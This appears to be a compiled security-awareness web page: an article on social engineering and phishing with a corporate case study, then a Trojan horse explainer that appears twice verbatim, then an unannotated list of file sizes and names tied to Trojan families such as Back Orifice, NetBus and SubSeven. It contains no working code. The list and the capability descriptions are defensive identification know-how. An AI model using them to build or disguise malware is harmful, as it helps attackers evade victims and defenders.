In Independence Day, the characters spoofed the mother ship with a physical Trojan horse. In Hackers, dumpster diving can't be achieved with a computer. In War Games, Matthew Broderick's character studied his target before attempting to crack the password, and then in Ferris Bueller's Day Off, his phone scam was sheer brilliance. You've got to love the low-tech approach. And although it would seem R2-D2's hack was entirely technical, remember he had to sneak into the room with the computer access point before achieving his goal.

The lesson here is that social engineering is a major component of hacking in both fictional and real scenarios. By merely trying to prevent infiltration on a technical level and ignoring the physical-social level, we are leaving ourselves wide open to attack.
Social engineering redefined
Bruce Schneier, author of Secrets & Lies: Digital Security in a Networked World, reminds us that social engineering, aka "socio-technical attacks" is really all about the human aspect, and that means trust. Kevin Mitnick, renowned and reformed hacker, in his book The Art of Deception, goes further to explain that people inherently want to be helpful and therefore are easily duped. They assume a level of trust in order to avoid conflict. It's all about, "gaining access to information that people think is innocuous when it isn't," and then using that information against the real target. We are the weakest link in the security chain. This point cannot be underemphasized. People are the weakest link, not technology.

This article is a followup to a social engineering series written several years ago. The goal is to go beyond the basics and explore how social engineering has been employed as technology has evolved over the past few years. For further information on social engineering, see this author's previous article, "Social Engineering Fundamentals, Part I: Hacker Tactics" and "Part II: Combat Strategies."

Since social engineering involves the human element of any attack, it's important to get into the head of the hacker and understand her motivation. Historically, the motivation has been intellectual challenge, bragging rights, access to sensitive information, simple curiosity, or our biggest fear - malicious intent. By knowing why we are at risk, we can better protect ourselves from the foolish things we do, thereby allowing social engineers to exploit us.

Targets of an attack can be both physical and psychological. Social engineering attacks will occur in person, over the phone, and online. No medium is safe from them. Individuals are targets for rampant identity theft and businesses fall prey to exploitation of a variety of holes. Weak passwords are always a target, as are file backdoors and improperly set permissions. That's the obvious stuff. What's changed over the past few years is that borders progressively don't matter. Words like "cyberterrorism" have become mainstream and we now even have an FBI-organized counter-terrorism posse of hackers waiting to pounce in the event of a massive online terrorist attack. Even some of the best hackers will use social engineering techniques against a victim (in combination with a highly technical approach) because it's simple, easy, and very effective. Social engineering is everywhere.
Types of attacks
The biggest change over the past four years, since our original article series on SecurityFoucs, is the exponential growth of e-commerce. Browsers and the use of the SSL (secure socket layer) protocol now are the norm for viewing everything from financial data to party invitations over webmail. Those of us who still use pine for email are in the minority. The types of attacks we see today tend to be targeted more toward web applications. Hidden programs running on web sites and hidden programs in email enclosures opened through webmail programs can host all kinds of dangers.

Browser add-ons can mask all kinds of rogue programs. DDoS (Distributed Denial of Service) attacks are still quite common and are a royal pain to combat, but they're not increasing in number the way identity theft is. Malware continues to plague everyone, although the widespread viruses of the nineties seem to have taken a back door to the browser back doors, most often installed as drive-by spyware by visiting a website. VoIP (Voice over Internet Protocol), being the new buzzword, has also attracted attackers with results varying from authentication failures to crashing phones.

So how does social engineering fit into the picture? Before employing some of the techniques noted above, some preliminary social engineering can be incredibly fruitful. Footprinting - the art of gathering information (or pre-hacking), is like a robber casing a bank. It's commonly done to research a predetermined target and determine the best opportunities for exploitation. Footprinting can include anything from phone calls from a role playing person asking seemingly innocent questions to physically mapping out buildings and data centers. And footprinting is a major social engineering component of a choreographed attack.
Phishing trips
Phishing is the most common form of social engineering online, and most notably includes email spoofs. It's a rare day where the average email inbox doesn't include some sort of spoof. Today, eBay, Paypal and Citibank are the most common targets. Phishing itself is not new, but the frequency has increased over the past few years. The user receives email claiming that his Paypal account information needs updating and the email includes a link that sends the user to a fake web site where he is instructed to enter his password to update his information. The web site then stores the real passwords for use in identity theft attacks against the real Paypal site. For more information about phishing, see Scott Granneman's article, "Phishing For Savvy Users."

The best response is to delete these messages before even looking at them, just in case a rogue program might be launching in the background. However, to be sure a genuine message from a site like Citibank or eBay isn't being ignored, the best course of action is to log into their main site login, by typing http://www.ebay.com/, and then check the account for a record of the email or of any sort of problem. Due to the nature of phishing, you can't reliably click on a link in your email anymore and be sure it's what it appears.

In the case of eBay, go to "my messages" or "my ebay" to verify the authenticity of the email sent. Paypal doesn't have this feature yet. It's also easy to send a quick note to spoof@ebay.com or spoof@paypal.com, forwarding the message in question, and they will respond quickly as to its authenticity. eBay recently adapted their email sent to users to include usernames in the subject and body of the message, to emphasize authenticity. In general though, the best practice is to assume the email is a fake and remove it permanently from any email archives.
Case study - Company X
To illustrate the importance of incorporating social engineering education into a corporate security program, here is an overview of the security for a fairly typical high-tech company, called "Company X" for the purposes of this article. Company X, a multi-billion dollar organization, spends millions on hardware and security, but in reality it only does the minimum of what is necessary to keep its assets secure. Such is the life of an average security program in the competitive market of high-tech.


Company X's physical (building) security includes badges for all employees, locked doors, security guards, and restricted access. Employees, however, tend to hold doors open for others and don't tend to check the photos on IDs when doing so. Dumpster areas are gated but unlocked, leaving them open to potential dumpster divers. Phone security is standard, allowing internal transfers and outgoing calls with blocked IDs. Remote access is through a VPN with SecureID, the use of which requires permission from a superior and inactive accounts are suspended within 30 days. Wireless access points in the buildings also fall under these restrictions.

As for hardware, remote drives are used, but employees are instructed not to store confidential information on the drives. Laptops are common, but only roughly 30% of users lock them with the provided cables. Shared drives on the internal network are protected by group permissions. On the system level, the company runs weekly virus scans. Security teams have reduced administrative rights on machines so employees can't install rogue programs. Password requirements are fairly standard, requiring a variety of characters, changed every few months.

Software comes standard for each machine. Screen savers are password protected, but not always locked. Most machines are open to Internet access, with the exception of some site blocking. Passwords can be saved in browsers, however. Email suffers from frequent server problems, webmail is not always secure, and IM use internally is rampant.

In the areas where social engineering prevention could be most useful, barely anything is done. When an employee is on the phone with Help Desk support, the employee's number comes up on phone but no standard authentication questions are asked by either the Help Desk staff or the employee being helped. CallerID spoofing would be a very simple way to get a password reset. Security training is available for home network usage and basic encryption, but departments differ in their use of these tools. No standard training is given for new employees, leaving the organization open to staff passing around a wide range of bad habits.

Sadly, Company X's security is not much better than it was ten years ago and it has barely evolved with the times. It's tough enough to keep up with the latest technology, patches, and filters with corporate budget cuts. Security teams tend to get the short end of the stick until the company suffers a major outage from an attack. Since various attacks became more public in recent years, everybody and their brother company claims to be secure - but the reality is that most companies are like Company X, struggling to maintain a basic level of security.
Countermeasures
What could Company X and others like it do to prevent attacks on the social engineering level? On the technical side, they must continue to install spam filters and update software patches, as a bare minimum. Making cryptography standard for email and web access, not allowing passwords to be saved in browsers, and changing to an internal messaging program are key technology step. The next step would be to develop an incident reporting and tracking program. This way they can discover additional holes in their program and attend to those holes. Incident reporting won't necessarily catch the intruders, but it helps to find ways to deter them.

Not to bite the hand that feeds us, but as Mitnick says, "anyone who thinks that security products alone offer true security is settling for the illusion of security." Therefore, training cannot be emphasized enough. New employee training, repeat training, regular updates, and fun security tips can keep the security education process fresh and lively. Some companies now use t-shirts and other paraphernalia to advertise security practices and remind employees to beware of suspicious phone calls and other potential phishing attempts. Help Desk staff need to have proper authentication procedures for all support calls. Security personnel should be adequately trained as well, and screened beyond regular employees in case they themselves pose a risk to the company.

Security policies used to have more bark than bite, but these days it's now common to put more teeth into them. Corporate policies, standards, guidelines, and so on cover a wide range of areas but the important thing is to develop them with growth and accountability in mind. Topics that should be covered in corporate policies include information sensitivity, password protection, ethics, acceptable use, email, database credentials, extranet usage, VPN security, and server security.

Also, pay attention to what's happening on the national and international level as far as ID theft laws and database protection are concerned. New bills are being developed to make identity theft more difficult through the greater protection of personal information.
The bottom line
Unfortunately, the reality is that intruders rarely get caught, and even when they are caught, the penalties haven't traditionally been stiff. Shouldn't we be more worried about serial murderers running loose than a bunch of computer geeks? Seriously though, identity theft, corporate espionage and cyber-terrorism are here to stay, so the bottom line lies in making a commitment to combating potential attackers.

At Company X the buck ultimately stops with the CIO, who must commit to improving their security program before they lose a significant amount of money and intellectual property to a major attack. That requires committing both the financial and people resources to the problem, and not dropping education and training from the budget. As individuals, we must commit to increasing our awareness of the risks we face and the potential openings we create for social engineers to fool us. The key, according to Schneier, lies in, "securing the interaction between the data and the people."

In any good security program, a realistic balance must be reached. There's always a fine line between an "atmosphere of paranoia" and a productive environment. However, if we err on the side of stronger security, knowing human error is the problem, we'll be more likely to achieve success. Just remember that we, the people, are the weakest link and as Mitnick writes, "Don't' be gullible!

Trojan!!

Hacking Via Trojan!! :

Trojan ( bad ) Beware !!!!
Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
upload and download files.
allowing remote access to the victim's computer. This is called a RAT. (remote administration tool)
spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
make screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phish for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing CD-ROM tray

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.

Methods of Infection

The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.
Trojan ( bad ) Beware !!!!
Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware , like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
upload and download files.
allowing remote access to the victim's computer. This is called a RAT. (remote administration tool)
spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
make screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phish for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing CD-ROM tray

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.

Methods of Infection

The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.
0 Changelog Back Orifice Communications Library
0 Bla.bla BLA trojan
0 Ipn.101 DataRape
0 Nam.101 DataRape
0 Por.101 DataRape
0 Udp.101 DataRape
5 Disk1.id NetBus 2.0 Pro
6 sniff.pid Shaft
8 Anam.101 DataRape
9 Lastip.sdf Snid
10 Stamp-h.in Back Orifice Communications Library
10 Cd-it.zip Warpcom
12 Snid.ini Snid
14 Ghlope.ini UandMe
15 Vclcntl.dll AOL Buddy
23 Runme.bat Modem Jammer
23 Resource.h.dsg Oblivion Dropper Source Generator
24 Paradise.ini Masters Paradise
26 Io.dll Retribution
26 Sprocks.bmp Retribution
26 Diskf.dll Retribution
26 Reginf.ret Retribution
26 Subseven.set SubSeven 2.2
27 Winstart.bat CrazzyNet
28 Module1.bas Log
31 Setup.ini NetBus 2.0 Pro
31 Install.bat Trojan Hide Tool
39 Pack.cmd Logger
40 Client.ini NokNok
43 Closew.bat 2000 Cracks
43 Readme.txt Alcarys.G
44 Acconfig.h Xremote
46 Apxi.dll ICQ Pager
46 Tools.kip SubSARI
47 Pcinvader.cfg PC Invader
47 Trojan.vbw TailGunner
49 Autopoll.ini Masters Paradise
49 Setup.lid Mos**ker
50 Pack_off.h Back Orifice Communications Library
51 Explorer.exe Reven
52 Acid setup.vbw Acid Shivers
52 Script.mrc neXus
54 Pl.bat Eversaw
56 D[censored].ini Donald [censored]
56 Icqcrk.gif Paradise trojan
62 Nettrash.ini NetTrash
62 Oxon.ini Oxon
62 St5unst.exe WinGrab
64 Dir.txt BackGate Kit
64 Winini.tmp -8,554 bytesDrone.cfg Pioneer
64 Newvbs.reg Worms Generator
66 Connector.exe.sig Connector
68 Pref.ini Frenzy
68 Pwmodify.dat PsychWard
69 Setup.ini Mos**ker
70 Defs.h Back Orifice Communications Library
71 Win.drv BuggyWorm
72 Dedicado A.....txt Zevach
73 Rsrc.dsg Oblivion Dropper Source Generator
75 clear yoyo
83 Th3tr41t0r.vbw The Traitor (= th3tr41t0r)
89 Cha_du_ri.bat WCup
89 Dd.ini WCup
93 Password.txt Frethem
96 Dosya.kip SubSARI
97 Includes.dsg Oblivion Dropper Source Generator
101 Deltree.dll MuSka52
108 Ctcp.mrc neXus
111 00000001.COM On4ever
111 00000002.COM On4ever
111 00000003.COM On4ever
111 00000004.COM On4ever
112 Register.reg RUX The TIc.K
113 Config Guangwai Ghost
113 Necuser3.tye HD trojan
114 V.vbs Alcarys.G
114 Install.bat Blood Fest Evolution
117 Cfgwin32.reg BO dll
118 Register.reg RTB 666
119 Data.tag Mos**ker
120 Doc.dll MuSka52
122 Rsrc.rc BSE
122 Agent.ini Cyber Sensor
125 Index.reg Bitchin Threads
126 Xp.bat Jerm
127 Make.bat Rux
127 Korea_rulez.vbs WCup
132 -infect-.p$ NetBus
134 Start.cmd Logger
134 Korea_win_worldcup2002.vbs WCup
137 Fooled.com Fooled
138 Setup.pkg NetBus 2.0 Pro
142 Install.bat Hvl RAT
146 Start.bat Alcarys.G
150 Qskrypt1.qsc Q-taz
150 Koreans_.reg WCup
160 File_id.diz Cybernetic Cowb0y´s NetBus
160 Srver.exe The Invasor
161 Nix.cnt The Nix
164 Crazzynet.ini CrazzyNet
166 Makefile.am Back Orifice Communications Library
170 Log.mak Log
178 Ftpcmds.txt BackGate Kit
178 File_id.diz NetBus 2.0 Pro
189 Pddt.dat Mini BackLash
190 Pack_on.h Back Orifice Communications Library
192 Bofacil.ini BO Facil
196 Medusa.mrc Medusa
202 Settings.dll Ass Sniffer
206 Psetup.dat Progenic Mail Trojan Construction Kit
210 Startadore Adore rootkit
226 Autoftp.ini Autoftp1
227 Dl.1bat BackGate Kit
227 Carla.txt.vbs Zevach
228 Fooled.zip Fooled
230 Lee Esto!.txt Zevach
233 Crack.reg ASPack
233 Flelist.xml Nakter Affe
237 Autoftp1.vbw Autoftp1
246 Prog.ini Trapdoor
249 Hookdump.ini Hookdump
254 Register.reg AccKontrol
254 Register.reg Black Angel
263 Module1.bas EH trojan
265 Trojan.com RBBS
280 Wckoat.sig Trojan Hide Tool
286 Jokes.trj EasyTrojan
286 Fix.bat Rathead
288 Config.h.in Xremote
289 Compile.bat PECompact
298 *.sig Silk Rope
301 Options.ini Connect4
302 Commands.cfg Undetected
314 Gimmerand.c ADM worm
317 Syphillisserver.dpr Syphillis
322 File_id.diz neXus
324 Startup.lnk Pando
329 Acub.dll A-trojan
333 VIERIKA.JPG.VBS Vierika
344 Login.txt BackGate Kit
344 03.d BackGate Kit
348 Config.ini Gip
351 Script.ini BuggyWorm
353 Layout.bin Mos**ker
362 Config.h Xremote
369 Uploader.bat Rux
370 Changelog Xremote
378 Cdecl.h Back Orifice Communications Library
379 s**ker.trj EasyTrojan
386 Explorer.cfg ZA Killer
396 Solffcor.sh Solaris rootkit
397 Vbs_f**k.zip f**k
400 Install.log Trojan Hide Tool
406 Ddoly121.zip Doly Trojan
417 Os.dat Mos**ker
428 V.reg Alcarys.G
433 Pack.bat Connect4
433 Qtrodel.zip QtroDel / QreoDel
445 Wsock32.bat BuggyWorm
450 Msvbvm60.dll Daodan
454 Cr.vbs Eversaw
454 Readme.vbs Snav
456 Resource.h Enigma´s Setup Trojan
457 Resource.h Silk Rope
461 Mirc.fire.490.zip Fire
464 Skin.ini SubSeven
470 Plugex.dpr Undetected
482 Index.htm DSS
486 Timer98.bat Funtime Apocolypse
487 Secto.com Sector-Zero
492 Timernt.bat Funtime Apocolypse
527 Kcr.com KCR
528 Attacker.cfg Attacker
533 HTML_Shit.zip Shit Trojan
536 Aweblite.zip Aphex WebDownloader LITE
537 Servustartuplog.txt BackGate Kit
545 Gimmeip ADM worm
546 Vbs.rabbit.zip Rabbit
547 Setuptrojan.dsw Enigma´s Setup Trojan
553 Skin.ini Undetected
586 Ecat.com ECat
594 Element.txt Elem
595 Nerte.cnt NerTe
610 Com2exe.com Rux
616 Send.tgz Remote Administration Tool - RAT
630 Trojan_Shit.htm Shit Trojan
632 Skin.ini Backage
662 Calculus.exe Calculus
663 Satas.mrc SataS Scan Script
668 Trojan17.exe FliMod
670 Startup ADM worm
672 Acid setup.vbp Acid Shivers
